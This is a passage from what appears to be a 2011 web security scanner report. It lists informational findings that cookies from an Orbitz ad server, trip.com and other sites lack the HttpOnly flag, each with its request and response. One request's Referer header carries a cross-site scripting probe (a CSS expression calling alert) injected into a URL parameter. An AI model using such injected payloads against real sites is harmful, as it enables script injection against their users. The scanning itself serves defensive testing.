GET /js.ng/channel=deals&Section=promo_activities&adsize=sponsorlogo&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573772004&dsrc=7&adType=noframe& HTTP/1.1
Accept: */*
Referer: http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=promotions&cnt=PRO&type=oa_qs35daf%22style%3d%22x:expression(alert(1))%221333ba1041f
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.revresda.com
Proxy-Connection: Keep-Alive
Cookie: NGUserID=aeb2124-3312-952975028-6

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:22:54 GMT
Server: Apache/2.2.3 (CentOS)
AdServer: egadserv001p.prod.orbitz.net:9678:1
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
Cteonnt-Length: 791
Content-Type: application/x-javascript
Cache-Control: private
Set-Cookie: NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e308be45525d5f4f58455e445a4a423660;path=/
Content-Length: 791

document.write('<img src=\"http://www.revresda.com:80/event.ng/Type=count&FlightID=64511&AdID=121020&TargetID=30062&Segments=65,3724,4979,7409,7949,8303,8773,11672,12591,22067,22782,24028,28587,28592,
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.revresda.com
Path:	/js.ng/channel=home&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e308be45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js.ng/channel=home&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7& HTTP/1.1
Host: www.revresda.com
Proxy-Connection: keep-alive
Referer: http://www.orbitz.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=aebaa22-3554-1360392959-4

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:22:29 GMT
Server: Apache/2.2.3 (CentOS)
AdServer: egadserv004p.prod.orbitz.net:9678:1
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
Cteonnt-Length: 749
Content-Type: application/x-javascript
Cache-Control: private
Set-Cookie: NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e308be45525d5f4f58455e445a4a423660;path=/
Content-Length: 749

document.write('<a target=_blank href=\"http://www.revresda.com/event.ng/Type=click&FlightID=90921&AdID=174434&TargetID=41061&Segments=&Targets=&Values=46,60,82,90,100,152,194,216,264,32876,33113,3315
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.revresda.com
Path:	/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&height=1&width=1&adType=noframe&pos=1&

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e308be45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&height=1&width=1&adType=noframe&pos=1& HTTP/1.1
Host: www.revresda.com
Proxy-Connection: keep-alive
Referer: http://www.orbitz.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=aebaa22-3554-1360392959-4

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:22:29 GMT
Server: Apache/2.2.3 (CentOS)
AdServer: egadserv004p.prod.orbitz.net:9678:1
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
Cteonnt-Length: 992
Content-Type: application/x-javascript
Cache-Control: private
Set-Cookie: NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e308be45525d5f4f58455e445a4a423660;path=/
Content-Length: 992

document.write('<a target=\"_top\" href=\"http://www.revresda.com/event.ng/Type=click&FlightID=20847&AdID=46177&TargetID=9413&ASeg=&AMod=&Segments=65,3522,3724,4354,4979,5788,7409,7949,8303,8427,8773,
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.revresda.com
Path:	/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&height=1&width=1&adType=noframe&pos=2&

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e308be45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&height=1&width=1&adType=noframe&pos=2& HTTP/1.1
Host: www.revresda.com
Proxy-Connection: keep-alive
Referer: http://www.orbitz.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=aebaa22-3554-1360392959-4

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:22:29 GMT
Server: Apache/2.2.3 (CentOS)
AdServer: egadserv004p.prod.orbitz.net:9678:1
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
Cteonnt-Length: 1898
Content-Type: application/x-javascript
Cache-Control: private
Set-Cookie: NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e308be45525d5f4f58455e445a4a423660;path=/
Content-Length: 1898

document.write('');
Event.observe('airbotForm','submit',function() {
   if (!/chrome/.test(navigator.userAgent.toLowerCase())){
       u_top = (screen.height-300)/2;
       u_left = (screen.width-730)/2;
       p_top
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.revresda.com
Path:	/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&height=1&width=1&adType=noframe&pos=3&

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e308be45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&height=1&width=1&adType=noframe&pos=3& HTTP/1.1
Host: www.revresda.com
Proxy-Connection: keep-alive
Referer: http://www.orbitz.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=aebaa22-3554-1360392959-4

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:22:29 GMT
Server: Apache/2.2.3 (CentOS)
AdServer: egadserv004p.prod.orbitz.net:9678:1
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
Cteonnt-Length: 1012
Content-Type: application/x-javascript
Cache-Control: private
Set-Cookie: NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e308be45525d5f4f58455e445a4a423660;path=/
Content-Length: 1012

document.write('<a target=\"_top\" href=\"http://www.revresda.com/event.ng/Type=click&FlightID=14212&AdID=29683&TargetID=42841&ASeg=&AMod=&Segments=65,3522,3724,4354,4979,5788,7409,7949,8303,8427,8773
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.revresda.com
Path:	/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&height=1&width=1&adType=noframe&pos=4&

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e308be45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&height=1&width=1&adType=noframe&pos=4& HTTP/1.1
Host: www.revresda.com
Proxy-Connection: keep-alive
Referer: http://www.orbitz.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=aebaa22-3554-1360392959-4

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:22:29 GMT
Server: Apache/2.2.3 (CentOS)
AdServer: egadserv004p.prod.orbitz.net:9678:1
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
Cteonnt-Length: 1010
Content-Type: application/x-javascript
Cache-Control: private
Set-Cookie: NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e308be45525d5f4f58455e445a4a423660;path=/
Content-Length: 1010

document.write('<a target=\"_top\" href=\"http://www.revresda.com/event.ng/Type=click&FlightID=3694&AdID=6521&TargetID=42842&ASeg=&AMod=&Segments=65,3522,3724,4354,4979,5788,7409,7949,8303,8427,8773,1
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.revresda.com
Path:	/js.ng/channel=home&Section=main&adsize=396x71&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e308be45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js.ng/channel=home&Section=main&adsize=396x71&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7& HTTP/1.1
Host: www.revresda.com
Proxy-Connection: keep-alive
Referer: http://www.orbitz.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=aebaa22-3554-1360392959-4

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:22:27 GMT
Server: Apache/2.2.3 (CentOS)
AdServer: egadserv004p.prod.orbitz.net:9678:1
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
Cteonnt-Length: 140
Content-Type: application/x-javascript
Cache-Control: private
Set-Cookie: NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e308be45525d5f4f58455e445a4a423660;path=/
Content-Length: 140

document.write('<img src=\"http://www.revresda.com/Marketing/Images/US/ORB/ORB_Telesales_395.jpg\" border=0 height=71 width=396 alt=\"\">');

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.revresda.com
Path:	/js.ng/channel=home&Section=main&adsize=468x60_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&height=60&width=468&adType=noframe&

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e308be45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js.ng/channel=home&Section=main&adsize=468x60_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&height=60&width=468&adType=noframe& HTTP/1.1
Host: www.revresda.com
Proxy-Connection: keep-alive
Referer: http://www.orbitz.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=aebaa22-3554-1360392959-4

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:22:27 GMT
Server: Apache/2.2.3 (CentOS)
AdServer: egadserv004p.prod.orbitz.net:9678:1
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
Cteonnt-Length: 1051
Content-Type: application/x-javascript
Cache-Control: private
Set-Cookie: NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e308be45525d5f4f58455e445a4a423660;path=/
Content-Length: 1051

document.write('<a target=\"_top\" href=\"http://www.revresda.com/event.ng/Type=click&FlightID=79312&AdID=151195&TargetID=41261&ASeg=&AMod=&Segments=65,3724,4979,5788,7409,7694,7949,8303,8773,11672,12
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.revresda.com
Path:	/js.ng/channel=home&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&height=150&width=519&adType=noframe&

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e308be45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js.ng/channel=home&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&height=150&width=519&adType=noframe& HTTP/1.1
Host: www.revresda.com
Proxy-Connection: keep-alive
Referer: http://www.orbitz.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=aebaa22-3554-1360392959-4

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:22:27 GMT
Server: Apache/2.2.3 (CentOS)
AdServer: egadserv004p.prod.orbitz.net:9678:1
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
Content-Type: application/x-javascript
Cache-Control: private
Set-Cookie: NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e308be45525d5f4f58455e445a4a423660;path=/
Content-Length: 19152

document.write('');
var imgSrc = 'http://www.orbitz.com/Marketing/Images/US/MERCH/expmod/orb/ORB_exp_Home_519x150_apr10.jpg';
var defaultHref = 'http://www.orbitz.com/event.ng/Type=click&FlightID=8149
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.revresda.com
Path:	/js.ng/channel=home&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&height=90&width=728&adType=noframe&

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e308be45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js.ng/channel=home&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&height=90&width=728&adType=noframe& HTTP/1.1
Host: www.revresda.com
Proxy-Connection: keep-alive
Referer: http://www.orbitz.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=aebaa22-3554-1360392959-4

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:22:28 GMT
Server: Apache/2.2.3 (CentOS)
AdServer: egadserv004p.prod.orbitz.net:9678:1
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
Cteonnt-Length: 1121
Content-Type: application/x-javascript
Cache-Control: private
Set-Cookie: NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e308be45525d5f4f58455e445a4a423660;path=/
Content-Length: 1121

document.write('<a target=\"_top\" href=\"http://www.revresda.com/event.ng/Type=click&FlightID=90067&AdID=215343&TargetID=10262&ASeg=&AMod=&Segments=65,3724,4979,5788,7409,7949,8303,8773,9236,11672,12
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.revresda.com
Path:	/js.ng/site=orbitz&Section=flightstatus&adsize=300x250&pos=left&Params.richmedia=&channel=travelerupdate&dest=&sessionID=50cd97fbd27584ff66dda9b41d9d34e0&CookieName=OSC&tile=12966613625991

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e388be45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js.ng/site=orbitz&Section=flightstatus&adsize=300x250&pos=left&Params.richmedia=&channel=travelerupdate&dest=&sessionID=50cd97fbd27584ff66dda9b41d9d34e0&CookieName=OSC&tile=12966613625991 HTTP/1.1
Host: www.revresda.com
Proxy-Connection: keep-alive
Referer: http://updates.orbitz.com/flight_status
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=aebaa22-3554-1360392959-4; NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e308be45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:47:11 GMT
Server: Apache/2.2.3 (CentOS)
AdServer: egadserv004p.prod.orbitz.net:9678:1
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
Cteonnt-Length: 19
Content-Type: application/x-javascript
Cache-Control: private
Set-Cookie: NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e388be45525d5f4f58455e445a4a423660;path=/
Content-Length: 19

document.write('');

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.revresda.com
Path:	/js.ng/site=orbitz&Section=flightstatus&adsize=300x250&pos=right&Params.richmedia=&channel=travelerupdate&dest=&sessionID=50cd97fbd27584ff66dda9b41d9d34e0&CookieName=OSC&tile=12966613625991

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e388be45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js.ng/site=orbitz&Section=flightstatus&adsize=300x250&pos=right&Params.richmedia=&channel=travelerupdate&dest=&sessionID=50cd97fbd27584ff66dda9b41d9d34e0&CookieName=OSC&tile=12966613625991 HTTP/1.1
Host: www.revresda.com
Proxy-Connection: keep-alive
Referer: http://updates.orbitz.com/flight_status
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=aebaa22-3554-1360392959-4; NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e308be45525d5f4f58455e445a4a423660

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.revresda.com
Path:	/js.ng/site=orbitz&Section=flightstatus&adsize=300x250&pos=top&Params.richmedia=&channel=travelerupdate&dest=&sessionID=50cd97fbd27584ff66dda9b41d9d34e0&CookieName=OSC&tile=12966613625991

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e388be45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js.ng/site=orbitz&Section=flightstatus&adsize=300x250&pos=top&Params.richmedia=&channel=travelerupdate&dest=&sessionID=50cd97fbd27584ff66dda9b41d9d34e0&CookieName=OSC&tile=12966613625991 HTTP/1.1
Host: www.revresda.com
Proxy-Connection: keep-alive
Referer: http://updates.orbitz.com/flight_status
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=aebaa22-3554-1360392959-4; NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e308be45525d5f4f58455e445a4a423660

Response

12.758. https://www.scanalert.com/RatingVerify previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.scanalert.com
Path:	/RatingVerify

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

resin=1724539402.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RatingVerify HTTP/1.1
Host: www.scanalert.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.759. http://www.theworkbuzz.com/career-advice/women-cautious-about-social-media-and-work/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.theworkbuzz.com
Path:	/career-advice/women-cautious-about-social-media-and-work/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

X-Mapping-caklakng=AB5BE8F3F900462BB56765F394471F1C; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /career-advice/women-cautious-about-social-media-and-work/?cobrand=msn&utm_source=MSN&utm_medium=MSNHP&utm_campaign=MSNCareers&gt1=23000 HTTP/1.1
Host: www.theworkbuzz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.760. http://www.theworkbuzz.com/employment-trends/video-interviews/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.theworkbuzz.com
Path:	/employment-trends/video-interviews/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

X-Mapping-caklakng=46B1EFBB3B916447A34716FB66E1BFF9; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /employment-trends/video-interviews/?cobrand=msn&utm_source=MSN&utm_medium=MSNJM&utm_campaign=MSNCareers HTTP/1.1
Host: www.theworkbuzz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.761. http://www.threatfire.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.threatfire.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

lang=en-US; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.threatfire.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Language: en-US
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Expires: Wed, 02 Feb 2011 19:30:16 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 02 Feb 2011 19:30:16 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: lang=en-US; path=/
Content-Length: 48669

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
ThreatFire An
...[SNIP]...

12.762. http://www.trip.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.trip.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

NSC_xxx.bxbz.dpn.80_dt_efgbvmu=ffffffff09e3cf3245525d5f4f58455e445a4a423660;path=/
NSC_xxx.bxbz.dpn.80_gxe=ffffffff09e3882b45525d5f4f58455e445a4a423660;path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.trip.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 16:18:14 GMT
Server: Apache/2.2.9 (Unix) mod_jk/1.2.15
Last-Modified: Fri, 21 Jan 2011 01:11:31 GMT
ETag: "b859-49a50ee2f96c0"
Accept-Ranges: bytes
Content-Length: 47193
Content-Type: text/html
Keep-Alive: timeout=5, max=68
Connection: Keep-Alive
Set-Cookie: NSC_xxx.bxbz.dpn.80_dt_efgbvmu=ffffffff09e3cf3245525d5f4f58455e445a4a423660;path=/
Set-Cookie: NSC_xxx.bxbz.dpn.80_gxe=ffffffff09e3882b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head>
<title>Cheap Flights, Hotels & Trips | Trip.com</tit
...[SNIP]...

12.763. http://www.trip.com/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.trip.com
Path:	/index.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

NSC_xxx.bxbz.dpn.80_dt_efgbvmu=ffffffff09e34a3745525d5f4f58455e445a4a423660;path=/
NSC_xxx.bxbz.dpn.80_gxe=ffffffff09e3882b45525d5f4f58455e445a4a423660;path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /index.html?type=air&utm_source=orbitz&utm_medium=crpopunder&utm_content=air&utm_campaign=triplooking&cmpid=1 HTTP/1.1
Host: www.trip.com
Accept: */*
